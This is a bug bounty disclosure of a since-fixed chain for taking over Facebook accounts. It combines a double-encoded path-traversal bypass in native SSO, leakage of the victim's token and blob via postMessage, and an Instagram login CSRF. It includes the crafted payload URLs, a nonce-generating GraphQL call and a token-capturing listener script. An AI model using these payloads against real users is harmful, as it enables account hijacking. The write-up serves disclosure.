Two-click Facebook account takeover via FXAuth token and blob theft

Introduction

Facebook and Instagram accounts are deeply integrated through Accounts Center, allowing users to link identities, share authentication methods, and manage security settings across platforms.

This integration relies on native SSO flows, FXAuth tokens, and redirect-based handoffs between Facebook and Instagram accountscenter domains. When these components are not strictly isolated, a single leaked token can be replayed across platforms and escalate into full account compromise.

This report describes a complete attack chain that allows an attacker to link a victim’s Facebook account to the attacker’s Instagram account and gain persistent access.

High-Level Impact

After successful exploitation, the attacker can:

Link the victim’s Facebook account to the attacker’s Instagram account
Control Facebook account settings through Accounts Center
Potentially authenticate into Facebook using Instagram login (mobile)
Maintain long-term access without Facebook credentials or 2FA

Descrption

Accounts Center Native SSO Endpoint

The vulnerability originates from the endpoint https://www.facebook.com/login/native_sso/. This endpoint is used for cross-app authentication and accepts several parameters, including:

app_id
token (FXAuth token to be signed)
extra_data (redirect path)

The extra_data parameter is validated based on the calling application.

For the Instagram application (app_id = 1217981644879628), Facebook historically allowed any redirect path starting with /accounts_center/. This behavior existed before accountscenter.instagram.com was introduced.

By abusing double url encoded characters and path traversal, it is possible to escape the intended /accounts_center/ prefix and redirect to any other endpoints while still passing validation.

The following crafted URL demonstrates the bypass:

https://www.facebook.com/login/native_sso/?
&flow=fbcal
&app_id=1217981644879628
&token=FXAUTH_TOKEN
&custom_content_config=accounts_center
&extra_data=/accounts_center/%252%0DE%252%0DE\%252%0DE%252%0DE\/%252%0DE%252%0DE\%252%0DE%252%0DE\any_endpoint

After user confirmation, the flow redirects to https://www.instagram.com/any_endpoint

Redirect endpoint : /billing_interfaces/external_result

The native SSO flow now could redirect to any endpoint in www.instagram.com, i managed to find this particular endpoint:

https://www.instagram.com/billing_interfaces/external_result/?
&token=TOKEN
&blob=BLOB

This endpoint would try to communicate with its opener and parent windows using postMessage with target origin set to *. Normally, only limited data is sent. However, when a valid nonce parameter is added to the endpoint, it would send the entire URL, leaking sensitive parameters including:

token
blob

This behavior enables token exfiltration. The nonce however cannot be guessed and must be generated legitimately for a specific Instagram user. This means that we will need to generate a nonce for the attacker Instagram account, then force login the instagram account inside the victim’s browser.

Attack Flow Summary

Preparation

I - Generating a valid nonce for the endpoint

Using an attacker-controlled Instagram account:

1) Visit https://www.instagram.com/ad_tools/

2) Click “Add funds” or “Payment Settings”

3) Capture a request containing an access_token, to either:

facebook.com/auth/token
graph.facebook.com

4) Use the access token to call the following GraphQL mutation:

https://graph.facebook.com/graphql/?
&locale=en_US
&access_token=ACCESS_TOKEN
&variables={
  "input": {
    "country": "US",
    "establish_type": "INIT",
    "logging_data": {
      "logging_counter": 41,
      "logging_id": "3790958217"
    },
    "payment_account_id": "PAYMENT_ACCOUNT_ID",
    "upl_logging_data": {},
    "actor_id": "1",
    "client_mutation_id": "16"
  }
}
&server_timestamps=true
&doc_id=8354858754606667
&method=post

Where PAYMENT_ACCOUNT_ID is obtained from the url:

https://business.facebook.com/billing_hub/payment_settings/?asset_id=PAYMENT_ACCOUNT_ID

The response contains a valid nonce value, for example: hwFlRFhb3krN0rprx16bYLQ2FQ9bpJei

This can be achieved using Instagram’s email-based login flow. When a user initiates a password reset on Instagram, they receive an email titled:

We’ve made it easy to get back on Instagram

The email contains a “Login as USERNAME” link pointing to:

https://www.instagram.com/_n/web_emaillogin?
&uid=ENCODED_UID
&token=LOGIN_NONCE
&auto_send=0

Visiting this URL automatically authenticates you in the browser and sets Instagram session cookies without requiring any further interaction. This endpoint acts as a login CSRF primitive.

III - Generating an FXAuth Token to be signed

The FXAuth token that we will use in this attack needs to be initially generated by the attacker, sent to the victim in the exploit, then use the received token and blob , which will be linked to the initial token, to finalize the linking process with the attacker account:

As the attacker:

1) Visit https://accountscenter.instagram.com/profiles/

2) Click “Add account”

3) You get redirected to:

   https://www.facebook.com/login/native_sso/?
   &flow=fbcalcomettest
   &app_id=1217981644879628
   &token=FXAUTH_TOKEN
   &extra_data=%2Fadd%2F%3Fbackground_page%3D%252Fprofiles%252F&custom_content_config=accounts_center

4) Extract the token parameter value and close the page without further interaction.

Attack

0) Victim visits attackers website

1) The attacker force the victim to login the his Instagram account by loading the Instagram login CSRF URL:

   https://www.instagram.com/_n/web_emaillogin?
   &uid=ENC_UID
   &token=LOGIN_NONCE
   &auto_send=0

2) After detecting the login, the attacker’s script opens a new window with the crafted Native SSO URL:

https://www.facebook.com/login/native_sso/?
&flow=fbcal
&app_id=1217981644879628
&token=FXAUTH_TOKEN
&custom_content_config=accounts_center
&extra_data=/accounts_center/%252%0DE%252%0DE\%252%0DE%252%0DE\/%252%0DE%252%0DE\%252%0DE%252%0DE\billing_interfaces\external_result?nonce=ATTACKER_NONCE

3) Victim confirms usage of Instagram app

4) The endpoint redirects back to https://business.facebook.com/billing_interfaces/external_result/?blob=VICTIM_BLOB&token=VICTIM_TOKEN&nonce=ATTACKER_NONCE.

5) The endpoint sends a message via postMessage to the opener window containing the full redirect URL

6) The attacker captures the message and extracts blob and token using this example listener

<html>
<body>
<script>
onmessage = (e) => {
  log_data(e.data.direct_debit_redirect_url);
};
</script>
</body>
</html>

7) Using the stolen victim’s blob and token, the attacker later navigates to:

https://accountscenter.instagram.com/add/?
&background_page=%2Fprofiles%2F
&blob=BLOB
&token=TOKEN
&auth_flow=linking

The victim’s Facebook account gets linked to the attacker’s Instagram account. At this point, the attacker gains control through Accounts Center and can manage settings or authenticate via Instagram.

Impact

This vulnerability enables cross-platform account takeover by chaining:

FXAuth token reuse
Weak redirect validation in native SSO
Token leakage via postMessage
Email-based Instagram login CSRF

The result is persistent Facebook account compromise without passwords or 2FA.

Timeline

Oct 16, 2024 — Bug reported

Oct 30, 2024 — Bug Acknowledged by Facebook

Nov 5, 2024 — Bug Fixed by Facebook

Nov 27, 2024 — $30,000 bounty awarded by Meta